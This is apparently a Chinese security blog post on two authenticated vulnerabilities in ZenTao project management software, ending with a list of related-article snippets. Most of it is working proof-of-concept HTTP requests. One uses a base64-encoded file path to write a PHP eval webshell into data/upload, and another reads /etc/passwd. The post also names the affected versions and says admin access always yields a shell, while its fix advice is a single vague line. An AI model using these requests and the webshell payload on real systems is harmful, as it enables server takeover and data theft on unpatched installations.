禅道linux一键安装漏洞,禅道漏洞第二弹后台读写任意文件/getshell
漏洞1: 任意文件写入漏洞 自评风险:严重
问题出在这里
这里新建方法的时候,其实会写到限定目录的,限定后是无法访问的所以这里,即使成功写也无法利用。不过,我们能跳出它的限制
老规矩,看poc
POST /zd/www/index.php?m=editor&f=save&filePath=L3Zhci93d3cvemQvd3d3L2RhdGEvdXBsb2FkLzEucGhw&action=newPage HTTP/1.1
Host: 172.16.0.128:81
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.0.128:81/zd/www/index.php?m=editor&f=edit&filePath=L3Zhci93d3cvemQvbW9kdWxlL2luc3RhbGwvZXh0L2NvbnRyb2wvaW5mby5waHA=&action=newPage&isExtends=
Cookie: lang=zh-cn; theme=default; windowWidth=700; windowHeight=612; keepLogin=on; za=admin; zp=478204cc9b8ad76200072d66a6183562dfb90781; sid=onfa3enukp3ib1burp2hvrobe6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
fileContent=<?php @eval($_POST['test']);?>
filePath 的值其实是目标文件的base64的编码值,所以,这里只要修改下就可以搞定了,当然,你得找个既能写入又能访问的目录,明显,data/upload/就是我们要的
直接拿到后门了。是不是很简单,别问我怎么得到物理路径的,随便到处都是,编辑的地方都有。
漏洞2:读文件 自评风险:高危
这个其实根据上面那个发现方法一样,利用方法也一样,只是这次换成读任意文件。
看poc:
GET /zd/www/index.php?m=editor&f=edit&filePath=L2V0Yy9wYXNzd2Q=&action=override&isExtends= HTTP/1.1
Host: 172.16.0.128:81
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.0.128:81/zd/www/index.php?m=editor&f=extend&moduleDir=install
Cookie: lang=zh-cn; theme=default; windowWidth=700; windowHeight=612; keepLogin=on; za=admin; zp=478204cc9b8ad76200072d66a6183562dfb90781; sid=onfa3enukp3ib1burp2hvrobe6
Connection: keep-alive
L2V0Yy9wYXNzd2Q= 这个就是/etc/passwd的base64的值了漏洞证明:
一直觉得这个证明的框有些多余,每个漏洞说明的时候其实就加上证明了。
个人测试了5.2 ,5.3 ,6.2 三个版本,都存在这个问题。只要你有后台权限,肯定拿shell的。
其中,url换成伪静态的时候远离也一样,那一长串就是目标文件的url的base64,记住这个就好了。修复方案:
老生常谈了,限制限制还是限制,不能想读那个就读那个,想写那个就写那个啊,
禅道linux一键安装漏洞,禅道漏洞第二弹后台读写任意文件/getshell相关推荐
- 禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记
禅道全版本rce漏洞复现笔记 漏洞说明 禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理.项目管理.测试管理于一体,同时还包含了事务管理.组织管理等诸多功能,是中小 ...
- 【服务器】Linux一键安装web环境全攻略(阿里云服务器)(Centos )
Centos 系统下的全能Web环境一键安装程序 热点 Round Serv 是Centos 系统下的全能Web环境一键安装程序 集成php jsp .net asp cgi python环境.和My ...
- w10系统自带linux系统,win10系统居然内置有Linux一键安装 新手有福了
花火网消息,也许很多小伙伴都知道Linux系统,但是苦于不会安装,这是一个大问题,其实这对于Windows10系统的用户来说完全不是问题,因为实际上Windows10系统内置有Linux一键安装,下面 ...
- Linux一键安装jdk (jdk-8u212-linux-x64.tar.gz 免费下载)
Linux一键安装jdk 思路 #第1步:提示用户安装jdk#第2步:删除centos自带的jdk#第3步:创建/usr/local/java目录,进入目录#第4步:下载jdk安装包#第5步:解压jd ...
- Goby 漏洞更新 | 万户 OA OfficeServer.jsp 任意文件上传漏洞
漏洞名称:万户 OA OfficeServer.jsp 任意文件上传漏洞 English Name:ezOFFICE OA OfficeServer.jsp Arbitrarily File Uplo ...
- linux一键安装node+npm
分享一个linux下一键安装node+npm脚本. 使用方式为: ./install-node.sh,然后输入版本号,node.js版本查询 切记不需要加 sudo 执行!!! 默认安装10.15.0 ...
- aria2 linux一键安装,Aria2一键安装及管理脚本,搭建AriaNg前端
说明:Aria2作为一款linux下的下载神器,可以下载http资源.种子文件.磁力链接等,功能强大,就不过多介绍了,此前提到过Aria2安装方法,这里再说个逗比大佬的一键脚本,很方便,推荐使用. 一 ...
- linux一键安装虚拟机系统
在上一篇博客中我们学习了如何编写脚本在系统中自动安装虚拟机,当我们安装好虚拟机以后,启动这台虚拟机,会发现进入到虚拟机的系统安装的界面,在进行分区,时区等设置以后,就完成了这台虚拟机系统的安装. 当我 ...
- linux一键安装rdp脚本,linux使用一键安装远程桌面环境/RDP脚本遇到问题与解决
老左前几天有在"Linux 系统一键安装远程桌面环境/RDP 支持CentOS/Debian/Ubuntu"文章中介绍到网友分享的一键安装桌面环境的方法,当时这篇文章的测试服务器是 ...
最新文章
- php url 安全性,在php中获取url内容的安全性
- Java项目:抽奖点名神器(HTML+可自定义抽选)
- [ JSOI 2015 ] Salesman
- 在Spring事务管理下,Synchronized为啥还线程不安全?
- 为什么你学不好Web前端?这些原因你需了解
- 自定义线程类中实例变量与其他线程共享与不共享
- visual studio toolbox 修复
- python direct_Python Qt.DirectConnection方法代码示例
- 小米6android版本更新,钉子户小米6的新生,换电池、背盖,升级android11
- poythoncode-实战4--读取文本文件,csv文件,存到系统中以大列表方式进行存储
- Minitab散点图技巧
- xp电脑自动锁定计算机,教你设置windows xp系统电脑自动关机的方法
- [云炬商业计划书阅读分享] 全国挑战杯创业计划大赛预赛评审办法
- Ubuntu安装teamviewer12
- Qt Creator 的下载与安装
- IOS开发教程第一季之02UI进阶day4合并IOS学习015--Segue小专题、沙盒存储小专题、归档/解档、TabBarController、App主流UI框架结构
- C语言编程——随机排座位+指定座位
- 从测序到宏基因组:聚焦菌群生信分析方法最前沿
- MySQL面试试题(五)
- Docker微容器之Alpine Linux 初体验